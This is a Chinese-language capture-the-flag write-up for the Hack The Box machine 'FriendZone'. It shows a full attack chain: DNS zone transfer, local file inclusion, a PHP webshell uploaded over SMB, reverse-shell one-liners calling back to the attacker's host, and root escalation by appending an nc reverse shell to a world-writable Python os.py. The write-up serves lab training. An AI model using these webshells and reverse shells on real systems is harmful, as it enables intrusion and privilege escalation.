FriendZone HTB Writeup
2023-03-13 本文已影响0人
doinb1517
logo.png
知识点
1、DNS域传送漏洞
2、文件包含漏洞
3、SMB共享目录写入webshell
4、crontab提权
WP
web权限
常规nmap扫描
┌──(kali㉿192)-[~]
└─$ nmap -sC -sV 10.10.10.123 1 ⨯
Starting Nmap 7.91 ( https://nmap.org ) at 2023-03-13 13:55 CST
Nmap scan report for 10.10.10.123
Host is up (0.25s latency).
Not shown: 993 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 a9:68:24:bc:97:1f:1e:54:a5:80:45:e7:4c:d9:aa:a0 (RSA)
| 256 e5:44:01:46:ee:7a:bb:7c:e9:1a:cb:14:99:9e:2b:8e (ECDSA)
|_ 256 00:4e:1a:4f:33:e8:a0:de:86:a6:e4:2a:5f:84:61:2b (ED25519)
53/tcp open domain ISC BIND 9.11.3-1ubuntu1.2 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.11.3-1ubuntu1.2-Ubuntu
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Friend Zone Escape software
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
443/tcp open ssl/http Apache httpd 2.4.29
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: 400 Bad Request
| ssl-cert: Subject: commonName=friendzone.red/organizationName=CODERED/stateOrProvinceName=CODERED/countryName=JO
| Not valid before: 2018-10-05T21:02:30
|_Not valid after: 2018-11-04T21:02:30
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
Service Info: Hosts: FRIENDZONE, 127.0.1.1; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: -39m50s, deviation: 1h09m15s, median: 8s
|_nbstat: NetBIOS name: FRIENDZONE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
| Computer name: friendzone
| NetBIOS computer name: FRIENDZONE\x00
| Domain name: \x00
| FQDN: friendzone
|_ System time: 2023-03-13T07:58:29+02:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2023-03-13T05:58:30
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 169.90 seconds
通过证书得到域名friendzone.red,同时页面上也给我们提供了一个域名friendzoneportal.red,尝试访问80端口,没有得到什么有效信息。
将这两个域名加入hosts文件
echo 10.10.10.123 friendzone.red >> /etc/hosts
echo 10.10.10.123 friendzoneportal.red >> /etc/hosts
01.png
直接访问443端口得到如下页面,访问爆破443端口的web目录
gobuster dir -u http://friendzone.red -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-small.txt
只找到了一个http://friendzone.red/wordpress/链接,我看到这个可爱的wordpress,啪的一下我就做起来了,很快啊。但是发现白高兴一场,这个链接是空的,并没有什么可以利用的东西
02.png
继续看看HTTPS协议的页面吧,现在访问页面变成了一张动图,依旧进行目录爆破,使用gobuster时候要加上参数-k不然会报证书错误,最终找到一个URL为https://friendzone.red/admin/,依旧是空的页面,没有什么价值。
03.png
# -k, --no-tls-validation Skip TLS certificate verification
┌──(kali㉿192)-[~]
└─$ gobuster dir -k -u https://friendzone.red -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-small.txt
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: https://friendzone.red
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-small.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Timeout: 10s
===============================================================
2023/03/13 14:47:46 Starting gobuster in directory enumeration mode
===============================================================
/admin (Status: 301) [Size: 318] [--> https://friendzone.red/admin/]
/js (Status: 301) [Size: 315] [--> https://friendzone.red/js/]
04.png
访问另一个js链接总算有所收获,但是不幸的是我不知道这些字符是啥意思。。
05.png
尝试利用SMB服务,使用smbmap快速查看共享文件和权限
┌──(kali㉿192)-[~]
└─$ smbmap -H 10.10.10.123
[+] Guest session IP: 10.10.10.123:445 Name: friendzone.red
Disk Permissions Comment
---- ----------- -------
print$ NO ACCESS Printer Drivers
Files NO ACCESS FriendZone Samba Server Files /etc/Files
general READ ONLY FriendZone Samba Server Files
Development READ, WRITE FriendZone Samba Server Files
IPC$ NO ACCESS IPC Service (FriendZone server (Samba, Ubuntu))
发现Development有读写权限,general是只读权限,使用smbclient尝试连接
┌──(kali㉿192)-[~]
└─$ smbclient //10.10.10.123/general
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Jan 17 04:10:51 2019
.. D 0 Tue Sep 13 22:56:24 2022
creds.txt N 57 Wed Oct 10 07:52:42 2018
3545824 blocks of size 1024. 1648408 blocks available
smb: \> get creds.txt
getting file \creds.txt of size 57 as creds.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
smb: \> exit
在creds.txt中找到了用户名和密码,尝试用这个用户名和密码ssh登陆靶机,发现失败。
┌──(kali㉿192)-[~]
└─$ cat creds.txt
creds for the admin THING:
admin:WORKWORKHhallelujah@#
于是我们继续收集信息,靶机开放了53端口,需要注意的是协议是TCP的,我们常见的DNS协议是UDP的,只有当DNS协议的数据大于512字节时才会使用TCP协议,另一种情况就是主从DNS服务器之间同步数据和信息时使用TCP协议,所以这里存在DNS域传送漏洞
使用dig发送axfr请求,axfr 是q-type类型的一种,axfr类型是Authoritative Transfer的缩写,指请求传送某个区域的全部记录。我们只要欺骗dns服务器发送一个axfr请求过去,如果该dns服务器上存在该漏洞,就会返回所有的解析记录值。
┌──(kali㉿192)-[~]
└─$ dig axfr @10.10.10.123 friendzoneportal.red 130 ⨯
; <<>> DiG 9.18.12-1-Debian <<>> axfr @10.10.10.123 friendzoneportal.red
; (1 server found)
;; global options: +cmd
friendzoneportal.red. 604800 IN SOA localhost. root.localhost. 2 604800 86400 2419200 604800
friendzoneportal.red. 604800 IN AAAA ::1
friendzoneportal.red. 604800 IN NS localhost.
friendzoneportal.red. 604800 IN A 127.0.0.1
admin.friendzoneportal.red. 604800 IN A 127.0.0.1
files.friendzoneportal.red. 604800 IN A 127.0.0.1
imports.friendzoneportal.red. 604800 IN A 127.0.0.1
vpn.friendzoneportal.red. 604800 IN A 127.0.0.1
friendzoneportal.red. 604800 IN SOA localhost. root.localhost. 2 604800 86400 2419200 604800
;; Query time: 251 msec
;; SERVER: 10.10.10.123#53(10.10.10.123) (TCP)
;; WHEN: Mon Mar 13 15:17:09 CST 2023
;; XFR size: 9 records (messages 1, bytes 309)
┌──(kali㉿192)-[~]
└─$ dig axfr @10.10.10.123 friendzone.red
; <<>> DiG 9.18.12-1-Debian <<>> axfr @10.10.10.123 friendzone.red
; (1 server found)
;; global options: +cmd
friendzone.red. 604800 IN SOA localhost. root.localhost. 2 604800 86400 2419200 604800
friendzone.red. 604800 IN AAAA ::1
friendzone.red. 604800 IN NS localhost.
friendzone.red. 604800 IN A 127.0.0.1
administrator1.friendzone.red. 604800 IN A 127.0.0.1
hr.friendzone.red. 604800 IN A 127.0.0.1
uploads.friendzone.red. 604800 IN A 127.0.0.1
friendzone.red. 604800 IN SOA localhost. root.localhost. 2 604800 86400 2419200 604800
;; Query time: 247 msec
;; SERVER: 10.10.10.123#53(10.10.10.123) (TCP)
;; WHEN: Mon Mar 13 15:17:15 CST 2023
;; XFR size: 8 records (messages 1, bytes 289)
将这些域名都加入到host文件中
echo 10.10.10.123 admin.friendzoneportal.red >> /etc/hosts
echo 10.10.10.123 administrator1.friendzone.red >> /etc/hosts
echo 10.10.10.123 hr.friendzone.red >> /etc/hosts
echo 10.10.10.123 uploads.friendzone.red >> /etc/hosts
echo 10.10.10.123 files.friendzoneportal.red >> /etc/hosts
echo 10.10.10.123 vpn.friendzoneportal.red >> /etc/hosts
我们访问https://administrator1.friendzone.red时找到了一个登陆页面,使用admin:WORKWORKHhallelujah@#登陆成功
06.png
07.png
根据提示访问dashboard.php
08.png
我们再次根据提示补全参数,可以看到左下角显示了最近访问的时间戳,不断刷新几次发现时间也是变化的,然后提示中写the script include wrong param !很容易就让我们想到了文件包含漏洞。
09.png
直接访问timestamp.php,可以看到和上面用参数包含时候一样的效果,这时候更加确认了就是文件包含漏洞
10.png
利用伪协议读取文件源码
https://administrator1.friendzone.red/dashboard.php?image_id=aa.jpg&pagename=php://filter/read=convert.base64-encode/resource=timestamp
# return data
PD9waHAKCgokdGltZV9maW5hbCA9IHRpbWUoKSArIDM2MDA7CgplY2hvICJGaW5hbCBBY2Nlc3MgdGltZXN0YW1wIGlzICR0aW1lX2ZpbmFsIjsKCgo/Pgo=
┌──(root192)-[/home/kali]
└─# echo PD9waHAKCgokdGltZV9maW5hbCA9IHRpbWUoKSArIDM2MDA7CgplY2hvICJGaW5hbCBBY2Nlc3MgdGltZXN0YW1wIGlzICR0aW1lX2ZpbmFsIjsKCgo/Pgo= |base64 -d
<?php
$time_final = time() + 3600;
echo "Final Access timestamp is $time_final";
?>
这是我们可以和前面发现的smb协议相结合,通过smb写入webshell,然后使用文件包含漏洞解析文件为PHP,实现getshell,这里我们需要注意的是smb的文件路径是什么,前面有提醒Files的路径是/etc/files,这里我们猜测就是在前面加/etc。
先写入webshell到smb
<?php system($_REQUEST['cmd']); ?>
smbclient -N //10.10.10.123/Development -c 'put cmd.php rshell.php'
https://administrator1.friendzone.red/dashboard.php?image_id=aa.jpg&pagename=../../../etc/Development/cmd&cmd=id
11.png
反弹shell过来
php -r '$sock=fsockopen("10.10.14.4",1234);exec("sh <&3 >&3 2>&3");'
https://administrator1.friendzone.red/dashboard.php?image_id=aa.jpg&pagename=../../../etc/Development/cmd&cmd=php%20-r%20%27%24sock%3Dfsockopen%28%2210.10.14.4%22%2C1234%29%3Bexec%28%22sh%20%3C%263%20%3E%263%202%3E%263%22%29%3B%27
拿到www-data的权限
┌──(root192)-[~/.ssh]
└─# nc -lvvp 1234 1 ⨯
listening on [any] 1234 ...
connect to [10.10.14.4] from friendzone.red [10.10.10.123] 58070
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@FriendZone:/var/www/admin$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@FriendZone:/var/www/admin$ cd /home
cd /home
www-data@FriendZone:/home$ ls
ls
friend
www-data@FriendZone:/home$ cd friend
cd friend
www-data@FriendZone:/home/friend$ cat user.txt
cat user.txt
721f9eafe6a1e5b750b4e3c404072d52
www-data@FriendZone:/home/friend$
friend权限
在web目录下找到了mysql_data.conf,其中保存了friend:Agpyu12!0.213$可以用这个密码切换到friend权限
www-data@FriendZone:/var/www$ ls -al
ls -al
total 36
drwxr-xr-x 8 root root 4096 Sep 13 17:53 .
drwxr-xr-x 12 root root 4096 Sep 13 17:53 ..
drwxr-xr-x 3 root root 4096 Sep 13 17:53 admin
drwxr-xr-x 4 root root 4096 Sep 13 17:53 friendzone
drwxr-xr-x 2 root root 4096 Sep 13 17:53 friendzoneportal
drwxr-xr-x 2 root root 4096 Sep 13 17:53 friendzoneportaladmin
drwxr-xr-x 3 root root 4096 Sep 13 17:53 html
-rw-r--r-- 1 root root 116 Oct 6 2018 mysql_data.conf
drwxr-xr-x 3 root root 4096 Sep 13 17:53 uploads
www-data@FriendZone:/var/www$ cat mysql ^H
cat mysql_data.conf
for development process this is the mysql creds for user friend
db_user=friend
db_pass=Agpyu12!0.213$
db_name=FZ
www-data@FriendZone:/var/www$ cat mysql_data.conf
cat mysql_data.conf
for development process this is the mysql creds for user friend
db_user=friend
db_pass=Agpyu12!0.213$
db_name=FZ
www-data@FriendZone:/var/www$ su friend
su friend
Password: Agpyu12!0.213$
friend@FriendZone:/var/www$ crontab -l
root权限
我们使用pspy检查靶机,首先查看主机架构为64位系统
friend@FriendZone:/var/www$ file /bin/ls
file /bin/ls
/bin/ls: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=9567f9a28e66f4d7ec4baf31cfbf68d0410f0ae6, stripped
下载pspy到靶机上
friend@FriendZone:/tmp$ wget http://10.10.14.4/pspy64
wget http://10.10.14.4/pspy64
--2023-03-13 10:52:55-- http://10.10.14.4/pspy64
Connecting to 10.10.14.4:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3104768 (3.0M) [application/octet-stream]
Saving to: ‘pspy64’
pspy64 100%[===================>] 2.96M 644KB/s in 4.7s
2023-03-13 10:53:00 (644 KB/s) - ‘pspy64’ saved [3104768/3104768]
friend@FriendZone:/tmp$ ls
ls
pspy64
friend@FriendZone:/tmp$ chmod +x pspy64
chmod +x pspy64
friend@FriendZone:/tmp$ ./pspy64
2023/03/13 10:54:01 CMD: UID=0 PID=1890 | /usr/bin/python /opt/server_admin/reporter.py
2023/03/13 10:54:01 CMD: UID=0 PID=1889 | /bin/sh -c /opt/server_admin/reporter.py
2023/03/13 10:54:01 CMD: UID=0 PID=1888 | /usr/sbin/CRON -f
发现root用户会使用crontab定期执行python脚本,查看此文件发现import os而且我们并没有修改文件和在此文件夹下创建任何文件的权力,我们试图在此文件夹下创建os文件去劫持执行流似乎不可行。
www-data@FriendZone:/var/www/admin$ ls -al /opt/server_admin/reporter.py
ls -al /opt/server_admin/reporter.py
-rwxr--r-- 1 root root 424 Jan 16 2019 /opt/server_admin/reporter.py
www-data@FriendZone:/var/www/admin$ cat /opt/server_admin/reporter.py
cat /opt/server_admin/reporter.py
#!/usr/bin/python
import os
to_address = "admin1@friendzone.com"
from_address = "admin2@friendzone.com"
print "[+] Trying to send email to %s"%to_address
#command = ''' mailsend -to admin2@friendzone.com -from admin1@friendzone.com -ssl -port 465 -auth -smtp smtp.gmail.co-sub scheduled results email +cc +bc -v -user you -pass "PAPAP"'''
#os.system(command)
# I need to edit the script later
# Sam ~ python developer
www-data@FriendZone:/var/www/admin$ ls -al /opt/server_admin
ls -al /opt/server_admin
total 12
drwxr-xr-x 2 root root 4096 Sep 13 17:53 .
drwxr-xr-x 3 root root 4096 Sep 13 17:53 ..
-rwxr--r-- 1 root root 424 Jan 16 2019 reporter.py
www-data@FriendZone:/var/www/admin$
可以打印一下python的路径
www-data@FriendZone:/var/www/admin$ python -c 'import sys; print "\n".join(sys.path)'
<$ python -c 'import sys; print "\n".join(sys.path)'
/usr/lib/python2.7
/usr/lib/python2.7/plat-x86_64-linux-gnu
/usr/lib/python2.7/lib-tk
/usr/lib/python2.7/lib-old
/usr/lib/python2.7/lib-dynload
/usr/local/lib/python2.7/dist-packages
/usr/lib/python2.7/dist-packages
检查后发现os权限为friend用户可写,于是我们修改os.py文件,实现提权
www-data@FriendZone:/usr/lib/python2.7$ ls -al|grep os
ls -al|grep os
-rwxr-xr-x 1 root root 19100 Apr 16 2018 _osx_support.py
-rwxr-xr-x 1 root root 11720 Oct 6 2018 _osx_support.pyc
-rwxrwxrwx 1 root root 25910 Jan 15 2019 os.py
-rw-rw-r-- 1 friend friend 25583 Jan 15 2019 os.pyc
-rwxr-xr-x 1 root root 4635 Apr 16 2018 os2emxpath.py
-rwxr-xr-x 1 root root 4507 Oct 6 2018 os2emxpath.pyc
-rwxr-xr-x 1 root root 8003 Apr 16 2018 posixfile.py
-rwxr-xr-x 1 root root 7628 Oct 6 2018 posixfile.pyc
-rwxr-xr-x 1 root root 13935 Apr 16 2018 posixpath.py
-rwxr-xr-x 1 root root 11385 Oct 6 2018 posixpath.pyc
反弹一个shell出来
echo "system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.4 1234 >/tmp/f')" >> /usr/lib/python2.7/os.py
得到root用户的flag
┌──(root192)-[/home/kali]
└─# nc -lvvp 1234 148 ⨯ 1
listening on [any] 1234 ...
connect to [10.10.14.4] from friendzone.red [10.10.10.123] 36654
/bin/sh: 0: can't access tty; job control turned off
# cat /root/root.txt
b0e6c60b82cf96e9855ac1656a9e90c7
#
